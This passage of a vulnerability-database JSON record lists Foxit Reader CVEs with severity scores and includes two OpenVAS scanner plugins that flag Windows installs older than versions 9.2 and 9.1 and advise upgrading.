\n[CVE-2018-14258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14258>)6.8High \n[CVE-2018-14259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14259>)6.8High \n[CVE-2018-14260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14260>)6.8High \n[CVE-2018-14261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14261>)6.8High \n[CVE-2018-14262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14262>)6.8High \n[CVE-2018-14263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14263>)6.8High \n[CVE-2018-14264](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14264>)6.8High \n[CVE-2018-14265](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14265>)6.8High \n[CVE-2018-14266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14266>)6.8High \n[CVE-2018-14267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14267>)6.8High \n[CVE-2018-14268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14268>)6.8High \n[CVE-2018-14269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14269>)6.8High \n[CVE-2018-14270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14270>)6.8High \n[CVE-2018-14271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14271>)6.8High \n[CVE-2018-14272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14272>)6.8High \n[CVE-2018-14273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14273>)6.8High \n[CVE-2018-14274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14274>)6.8High \n[CVE-2018-14275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14275>)6.8High \n[CVE-2018-14276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14276>)6.8High \n[CVE-2018-14277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14277>)6.8High \n[CVE-2018-14278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14278>)6.8High \n[CVE-2018-14279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14279>)6.8High \n[CVE-2018-14280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14280>)6.8High \n[CVE-2018-14281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14281>)6.8High \n[CVE-2018-14282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14282>)6.8High \n[CVE-2018-14283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14283>)6.8High \n[CVE-2018-14284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14284>)6.8High \n[CVE-2018-14285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14285>)6.8High \n[CVE-2018-14286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14286>)6.8High \n[CVE-2018-14287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14287>)6.8High \n[CVE-2018-14288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14288>)6.8High \n[CVE-2018-14289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14289>)4.3Warning \n[CVE-2018-14290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14290>)6.8High \n[CVE-2018-14291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14291>)6.8High \n[CVE-2018-14292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14292>)6.8High \n[CVE-2018-14293](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14293>)6.8High \n[CVE-2018-14294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14294>)6.8High \n[CVE-2018-14295](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14295>)6.8High \n[CVE-2018-14296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14296>)6.8High \n[CVE-2018-14297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14297>)6.8High \n[CVE-2018-14298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14298>)6.8High \n[CVE-2018-14299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14299>)6.8High \n[CVE-2018-14300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14300>)6.8High \n[CVE-2018-14301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14301>)6.8High \n[CVE-2018-14302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14302>)6.8High \n[CVE-2018-14303](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14303>)6.8High \n[CVE-2018-14304](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14304>)6.8High \n[CVE-2018-14305](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14305>)6.8High \n[CVE-2018-14306](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14306>)6.8High \n[CVE-2018-14307](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14307>)6.8High \n[CVE-2018-14308](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14308>)6.8High \n[CVE-2018-14309](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14309>)6.8High \n[CVE-2018-14310](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14310>)6.8High \n[CVE-2018-14311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14311>)6.8High \n[CVE-2018-14312](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14312>)6.8High \n[CVE-2018-14313](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14313>)6.8High \n[CVE-2018-14314](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14314>)6.8High \n[CVE-2018-14315](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14315>)2.6Warning \n[CVE-2018-14316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14316>)6.8High \n[CVE-2018-14317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14317>)6.8High \n[CVE-2018-3924](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3924>)8.8Critical \n[CVE-2018-3939](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3939>)7.8Critical", "edition": 27, "modified": "2020-05-22T00:00:00", "published": "2018-07-19T00:00:00", "id": "KLA11314", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11314", "title": "\r KLA11314Multiple vulnerabilities in Foxit Reader ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14302", "CVE-2018-14281", "CVE-2018-17619", "CVE-2018-14283", "CVE-2018-11621", "CVE-2018-14264", "CVE-2018-14306", "CVE-2018-14276", "CVE-2018-14246", "CVE-2018-14272", "CVE-2018-14305", "CVE-2018-14290", "CVE-2018-14271", "CVE-2018-14243", "CVE-2018-14270", "CVE-2018-14241", "CVE-2018-14275", "CVE-2018-14304", "CVE-2018-14244", "CVE-2018-14258", "CVE-2018-14265", "CVE-2018-17618", "CVE-2018-14253", "CVE-2018-14309", "CVE-2018-14291", "CVE-2018-14286", "CVE-2018-17621", "CVE-2018-14257", "CVE-2018-14310", "CVE-2018-14254", "CVE-2018-17622", "CVE-2018-14279", "CVE-2018-14262", "CVE-2018-14301", "CVE-2018-3939", "CVE-2018-14274", "CVE-2018-14285", "CVE-2018-14260", "CVE-2018-14278", "CVE-2018-14307", "CVE-2018-17615", "CVE-2018-14293", "CVE-2018-14266", "CVE-2018-14315", "CVE-2018-14300", "CVE-2018-14294", "CVE-2018-14317", "CVE-2018-14312", "CVE-2018-14263", "CVE-2018-14297", "CVE-2018-14287", "CVE-2018-14242", "CVE-2018-14308", "CVE-2018-11617", "CVE-2018-14314", "CVE-2018-14249", "CVE-2018-14277", "CVE-2018-14261", "CVE-2018-14245", "CVE-2018-14273", "CVE-2018-14248", "CVE-2018-14316", "CVE-2018-14311", "CVE-2018-14292", "CVE-2018-14267", "CVE-2018-14247", "CVE-2018-11622", "CVE-2018-17617", "CVE-2018-14259", "CVE-2018-14313", "CVE-2018-14255", "CVE-2018-14268", "CVE-2018-14288", "CVE-2018-14298", "CVE-2018-17616", "CVE-2018-11620", "CVE-2018-11619", "CVE-2018-14256", "CVE-2018-17620", "CVE-2018-14269", "CVE-2018-11618", "CVE-2018-14284", "CVE-2018-14299", "CVE-2018-14289", "CVE-2018-17624", "CVE-2018-11623", "CVE-2018-3924", "CVE-2018-14280", "CVE-2018-14252", "CVE-2018-14303", "CVE-2018-14282", "CVE-2018-14251", "CVE-2018-14250"], "description": "The host is installed with Foxit Reader and\n is prone to multiple code execution vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813263", "type": "openvas", "title": "Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation;\n# either version 2 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813263\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2018-11617\", \"CVE-2018-11618\", \"CVE-2018-11619\", \"CVE-2018-11620\",\n \"CVE-2018-11621\", \"CVE-2018-11622\", \"CVE-2018-11623\", \"CVE-2018-14241\",\n \"CVE-2018-14242\", \"CVE-2018-14243\", \"CVE-2018-14244\", \"CVE-2018-14245\",\n \"CVE-2018-14246\", \"CVE-2018-14247\", \"CVE-2018-14248\", \"CVE-2018-14249\",\n \"CVE-2018-14250\", \"CVE-2018-14251\", \"CVE-2018-14252\", \"CVE-2018-14253\",\n \"CVE-2018-14254\", \"CVE-2018-14255\", \"CVE-2018-14256\", \"CVE-2018-14257\",\n \"CVE-2018-14258\", \"CVE-2018-14259\", \"CVE-2018-14260\", \"CVE-2018-14261\",\n \"CVE-2018-14262\", \"CVE-2018-14263\", \"CVE-2018-14264\", \"CVE-2018-14265\",\n \"CVE-2018-14266\", \"CVE-2018-14267\", \"CVE-2018-14268\", \"CVE-2018-14269\",\n \"CVE-2018-14270\", \"CVE-2018-14271\", \"CVE-2018-14272\", \"CVE-2018-14273\",\n \"CVE-2018-14274\", \"CVE-2018-14275\", \"CVE-2018-14276\", \"CVE-2018-14277\",\n \"CVE-2018-14278\", \"CVE-2018-14279\", \"CVE-2018-14280\", \"CVE-2018-14281\",\n \"CVE-2018-14282\", \"CVE-2018-14283\", \"CVE-2018-14284\", \"CVE-2018-14285\",\n \"CVE-2018-14286\", \"CVE-2018-14287\", \"CVE-2018-14288\", \"CVE-2018-14289\",\n \"CVE-2018-14290\", \"CVE-2018-14291\", \"CVE-2018-14292\", \"CVE-2018-14293\",\n \"CVE-2018-14294\", \"CVE-2018-14297\", \"CVE-2018-14298\", \"CVE-2018-14299\",\n \"CVE-2018-14300\", \"CVE-2018-14301\", \"CVE-2018-14302\", \"CVE-2018-14303\",\n \"CVE-2018-14304\", \"CVE-2018-14305\", \"CVE-2018-14306\", \"CVE-2018-14307\",\n \"CVE-2018-14308\", \"CVE-2018-14309\", \"CVE-2018-14310\", \"CVE-2018-14311\",\n \"CVE-2018-14312\", \"CVE-2018-14313\", \"CVE-2018-14314\", \"CVE-2018-14315\",\n \"CVE-2018-14316\", \"CVE-2018-14317\", \"CVE-2018-3924\", \"CVE-2018-3939\",\n \"CVE-2018-17624\", \"CVE-2018-17622\", \"CVE-2018-17620\", \"CVE-2018-17621\",\n \"CVE-2018-17618\", \"CVE-2018-17619\", \"CVE-2018-17617\", \"CVE-2018-17615\",\n \"CVE-2018-17616\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 15:00:12 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit Reader and\n is prone to multiple code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The user-after-free vulnerability that exists in the JavaScript, When\n executing embedded JavaScript code a document can be cloned. which frees\n a lot of used objects, but the JavaScript can continue to execute.\n\n - The use-after-free vulnerability found in the Javascript engine that can\n result in remote code execution.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Foxit Reader versions before 9.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.2\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_reader_detect_portable_win.nasl\");\n script_mandatory_keys(\"foxit/reader/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\nif(version_is_less(version:pdfVer, test_version:\"9.2\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.2\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1180", "CVE-2018-5676", "CVE-2018-10476", "CVE-2018-9977", "CVE-2018-10495", "CVE-2018-10490", "CVE-2018-5680", "CVE-2018-9961", "CVE-2018-10493", "CVE-2018-9982", "CVE-2018-9935", "CVE-2018-1173", "CVE-2018-9968", "CVE-2018-9984", "CVE-2018-9951", "CVE-2018-10485", "CVE-2018-9964", "CVE-2018-5679", "CVE-2018-9952", "CVE-2018-10475", "CVE-2018-9979", "CVE-2018-9959", "CVE-2018-5677", "CVE-2018-9962", "CVE-2018-10303", "CVE-2018-1177", "CVE-2018-9963", "CVE-2018-9958", "CVE-2018-9940", "CVE-2018-9975", "CVE-2018-9941", "CVE-2018-9948", "CVE-2018-10483", "CVE-2018-5675", "CVE-2018-1178", "CVE-2018-10473", "CVE-2018-9971", "CVE-2018-3939", "CVE-2018-9947", "CVE-2018-10480", "CVE-2018-9954", "CVE-2018-9938", "CVE-2018-9939", "CVE-2018-10478", "CVE-2018-3843", "CVE-2018-9949", "CVE-2018-17623", "CVE-2018-1176", "CVE-2018-10474", "CVE-2018-10484", "CVE-2018-9976", "CVE-2018-9983", "CVE-2018-9981", "CVE-2018-10482", "CVE-2018-9956", "CVE-2018-10492", "CVE-2018-9936", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-5678", "CVE-2018-10477", "CVE-2018-10494", "CVE-2018-3853", "CVE-2018-10479", "CVE-2018-9972", "CVE-2018-9943", "CVE-2018-9974", "CVE-2018-10487", "CVE-2018-5674", "CVE-2018-1179", "CVE-2018-9965", "CVE-2018-9942", "CVE-2018-9980", "CVE-2018-9969", "CVE-2018-7407", "CVE-2018-3842", "CVE-2018-9978", "CVE-2018-9945", "CVE-2018-9955", "CVE-2018-9950", "CVE-2018-1174", "CVE-2018-9966", "CVE-2018-9957", "CVE-2018-9946", "CVE-2018-10486", "CVE-2018-9960", "CVE-2018-3924", "CVE-2018-1175", "CVE-2018-10488", "CVE-2018-9944", "CVE-2018-10489", "CVE-2018-9937", "CVE-2018-9967", "CVE-2018-9970", "CVE-2018-3850", "CVE-2018-10491", "CVE-2018-10481", "CVE-2018-9973", "CVE-2018-9953", "CVE-2017-14458"], "description": "The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310813156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813156", "type": "openvas", "title": "Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813156\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2017-14458\", \"CVE-2017-17557\", \"CVE-2018-10302\", \"CVE-2018-10303\",\n \"CVE-2018-10473\", \"CVE-2018-10474\", \"CVE-2018-10475\", \"CVE-2018-10476\",\n \"CVE-2018-10477\", \"CVE-2018-10478\", \"CVE-2018-10479\", \"CVE-2018-10480\",\n \"CVE-2018-10481\", \"CVE-2018-10482\", \"CVE-2018-10483\", \"CVE-2018-10484\",\n \"CVE-2018-10485\", \"CVE-2018-10486\", \"CVE-2018-10487\", \"CVE-2018-10488\",\n \"CVE-2018-10489\", \"CVE-2018-10490\", \"CVE-2018-10491\", \"CVE-2018-10492\",\n \"CVE-2018-10493\", \"CVE-2018-10494\", \"CVE-2018-10495\", \"CVE-2018-1173\",\n \"CVE-2018-1174\", \"CVE-2018-1175\", \"CVE-2018-1176\", \"CVE-2018-1177\",\n \"CVE-2018-1178\", \"CVE-2018-1179\", \"CVE-2018-1180\", \"CVE-2018-3842\",\n \"CVE-2018-3843\", \"CVE-2018-3850\", \"CVE-2018-3853\", \"CVE-2018-5674\",\n \"CVE-2018-5675\", \"CVE-2018-5676\", \"CVE-2018-5677\", \"CVE-2018-5678\",\n \"CVE-2018-5679\", \"CVE-2018-5680\", \"CVE-2018-7407\", \"CVE-2018-9935\",\n \"CVE-2018-9936\", \"CVE-2018-9937\", \"CVE-2018-9938\", \"CVE-2018-9939\",\n \"CVE-2018-9940\", \"CVE-2018-9941\", \"CVE-2018-9942\", \"CVE-2018-9943\",\n \"CVE-2018-9944\", \"CVE-2018-9945\", \"CVE-2018-9946\", \"CVE-2018-9947\",\n \"CVE-2018-9948\", \"CVE-2018-9949\", \"CVE-2018-9950\", \"CVE-2018-9951\",\n \"CVE-2018-9952\", \"CVE-2018-9953\", \"CVE-2018-9954\", \"CVE-2018-9955\",\n \"CVE-2018-9956\", \"CVE-2018-9957\", \"CVE-2018-9958\", \"CVE-2018-9959\",\n \"CVE-2018-9960\", \"CVE-2018-9961\", \"CVE-2018-9962\", \"CVE-2018-9963\",\n \"CVE-2018-9964\", \"CVE-2018-9965\", \"CVE-2018-9966\", \"CVE-2018-9967\",\n \"CVE-2018-9968\", \"CVE-2018-9969\", \"CVE-2018-9970\", \"CVE-2018-9971\",\n \"CVE-2018-9972\", \"CVE-2018-9973\", \"CVE-2018-9974\", \"CVE-2018-9975\",\n \"CVE-2018-9976\", \"CVE-2018-9977\", \"CVE-2018-9978\", \"CVE-2018-9979\",\n \"CVE-2018-9980\", \"CVE-2018-9981\", \"CVE-2018-9982\", \"CVE-2018-9983\",\n \"CVE-2018-9984\", \"CVE-2018-3924\", \"CVE-2018-3939\", \"CVE-2018-17623\");\n script_bugtraq_id(105602);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 14:35:06 +0530 (Wed, 25 Apr 2018)\");\n script_name(\"Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error where the application passes an insufficiently qualified path in\n loading an external library when a user launches the application.\n\n - A heap buffer overflow error.\n\n - Multiple use-after-free errors.\n\n - The use of uninitialized new 'Uint32Array' object or member variables in\n 'PrintParams' or 'm_pCurContex' objects.\n\n - An incorrect memory allocation, memory commit, memory access, or array access.\n\n - Type Confusion errors.\n\n - An error in 'GoToE' & 'GoToR' Actions.\n\n - An out-of-bounds read error in the '_JP2_Codestream_Read_SOT' function.\n\n - An error since the application did not handle a COM object properly.\n\n - An error allowing users to embed executable files.\n\n - U3D out-of-bounds read, write and access errors.\n\n - U3D uninitialized pointer error.\n\n - U3D heap buffer overflow or stack-based buffer overflow error.\n\n - An error when the application is not running in safe-reading-mode and can\n be abused via '_JP2_Codestream_Read_SOT' function.\n\n - U3D Type Confusion errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit Reader versions 9.0.1.1049 and prior on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n script_xref(name:\"URL\", value:\"https://www.securitytracker.com/id/1040733\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_reader_detect_portable_win.nasl\");\n script_mandatory_keys(\"foxit/reader/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 9.1 == 9.1.0.5096\nif(version_is_less(version:pdfVer, test_version:\"9.1.0.5096\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.1\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
